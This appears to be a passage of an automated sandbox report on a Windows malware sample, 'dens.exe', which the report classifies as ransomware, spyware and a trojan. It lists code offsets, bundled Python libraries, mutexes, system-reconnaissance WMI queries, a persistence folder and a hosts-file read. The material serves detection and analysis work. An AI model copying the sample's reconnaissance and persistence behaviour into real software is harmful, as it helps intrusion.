            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0F89E01_2_00007FF62C0F89E0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C10DA5C1_2_00007FF62C10DA5C
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0FA2DB1_2_00007FF62C0FA2DB
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C101B501_2_00007FF62C101B50
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1164181_2_00007FF62C116418
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C102C101_2_00007FF62C102C10
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C1108C81_2_00007FF62C1108C8
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C113C101_2_00007FF62C113C10
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0FA47B1_2_00007FF62C0FA47B
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0FACAD1_2_00007FF62C0FACAD
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C105D301_2_00007FF62C105D30
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAA512F01_2_00007FFDFAA512F0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAA518801_2_00007FFDFAA51880
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABD2A201_2_00007FFDFABD2A20
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABED0301_2_00007FFDFABED030
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB89CB01_2_00007FFDFAB89CB0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABF4D901_2_00007FFDFABF4D90
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB892601_2_00007FFDFAB89260
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB922101_2_00007FFDFAB92210
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB73BF01_2_00007FFDFAB73BF0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB8CBF01_2_00007FFDFAB8CBF0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABD4BF01_2_00007FFDFABD4BF0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABC6C101_2_00007FFDFABC6C10
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABDBBD01_2_00007FFDFABDBBD0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB79B801_2_00007FFDFAB79B80
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB868E01_2_00007FFDFAB868E0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABDC9101_2_00007FFDFABDC910
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABE28B61_2_00007FFDFABE28B6
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABE78601_2_00007FFDFABE7860
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB7286E1_2_00007FFDFAB7286E
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABB58901_2_00007FFDFABB5890
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB7F9A01_2_00007FFDFAB7F9A0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB999801_2_00007FFDFAB99980
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABB4E801_2_00007FFDFABB4E80
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB970201_2_00007FFDFAB97020
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAC0CFF01_2_00007FFDFAC0CFF0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB980001_2_00007FFDFAB98000
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABCCD001_2_00007FFDFABCCD00
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB7BCC01_2_00007FFDFAB7BCC0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABACC791_2_00007FFDFABACC79
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABC0DB01_2_00007FFDFABC0DB0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAC08DD01_2_00007FFDFAC08DD0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABFADD01_2_00007FFDFABFADD0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB80D701_2_00007FFDFAB80D70
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAC22D901_2_00007FFDFAC22D90
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABCBD801_2_00007FFDFABCBD80
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB9DD901_2_00007FFDFAB9DD90
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB8C3301_2_00007FFDFAB8C330
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABBF3401_2_00007FFDFABBF340
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB9F2E01_2_00007FFDFAB9F2E0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB9D2F01_2_00007FFDFAB9D2F0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB773161_2_00007FFDFAB77316
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB732D51_2_00007FFDFAB732D5
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABD74201_2_00007FFDFABD7420
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABFA4301_2_00007FFDFABFA430
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAC344401_2_00007FFDFAC34440
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABFC0F01_2_00007FFDFABFC0F0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB741001_2_00007FFDFAB74100
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB8D2501_2_00007FFDFAB8D250
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAC251801_2_00007FFDFAC25180
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB821901_2_00007FFDFAB82190
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABCE7401_2_00007FFDFABCE740
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABCB6701_2_00007FFDFABCB670
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB7A8501_2_00007FFDFAB7A850
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB748001_2_00007FFDFAB74800
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABD07901_2_00007FFDFABD0790
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABBA5401_2_00007FFDFABBA540
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB745501_2_00007FFDFAB74550
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB794C01_2_00007FFDFAB794C0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABE44801_2_00007FFDFABE4480
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAC156301_2_00007FFDFAC15630
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB836001_2_00007FFDFAB83600
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFABA15A01_2_00007FFDFABA15A0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB9E5A01_2_00007FFDFAB9E5A0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAB945601_2_00007FFDFAB94560
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 82_2_00007FFD9A2800AD82_2_00007FFD9A2800AD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 82_2_00007FFD9A284FD382_2_00007FFD9A284FD3
            Source: C:\Users\user\Desktop\dens.exeCode function: String function: 00007FF62C0F2710 appears 104 times
            Source: C:\Users\user\Desktop\dens.exeCode function: String function: 00007FFDFABA1E20 appears 33 times
            Source: C:\Users\user\Desktop\dens.exeCode function: String function: 00007FFDFAB79330 appears 135 times
            Source: C:\Users\user\Desktop\dens.exeCode function: String function: 00007FF62C0F2910 appears 34 times
            Source: C:\Users\user\Desktop\dens.exeCode function: String function: 00007FFDFAB7A490 appears 162 times
            Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: python3.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
            Source: dens.exe, 00000000.00000003.1666268915.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1666599668.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664725190.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1666196697.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665506325.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1666130356.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665849743.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_wmi.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1661110438.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs dens.exe
            Source: dens.exe, 00000000.00000003.1663980456.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1666519024.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665921025.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1666675608.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664590602.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1666061436.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1691107697.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1663850239.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665572074.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664185093.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664454967.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1663915027.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs dens.exe
            Source: dens.exe, 00000000.00000003.1665639486.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665989863.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1664523044.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665300726.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665234767.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1666432610.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1664254134.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665779625.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665091592.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1665368820.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1665022014.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1664318244.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664117143.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs dens.exe
            Source: dens.exe, 00000000.00000003.1664659823.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1665157382.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs dens.exe
            Source: dens.exe, 00000000.00000003.1665435710.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664385796.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1663289848.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1661475799.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs dens.exe
            Source: dens.exe, 00000000.00000003.1666353635.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1664047310.00000107DAD65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exe, 00000000.00000003.1662940240.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs dens.exe
            Source: dens.exe, 00000000.00000003.1665708925.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs dens.exe
            Source: dens.exeBinary or memory string: OriginalFilename vs dens.exe
            Source: dens.exe, 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs dens.exe
            Source: dens.exe, 00000001.00000002.2057481054.000002D9AA8E0000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs dens.exe
            Source: dens.exe, 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs dens.exe
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Users\user\Desktop\dens.exeProcess created: Commandline size = 3647
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
            Source: C:\Users\user\Desktop\dens.exeProcess created: Commandline size = 3647Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
            Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.evad.winEXE@144/329@5/7
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\WaltuhiumUpdateService\Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2416:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1136:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2908:120:WilError_03
            Source: C:\Users\user\Desktop\dens.exeMutant created: \Sessions\1\BaseNamedObjects\W
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
            Source: C:\Users\user\Desktop\dens.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62482Jump to behavior
            Source: dens.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\dens.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\dens.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\cmd.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: tasklist.exe, 0000001D.00000003.1763963862.0000022FF79DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processystem32;^
            Source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
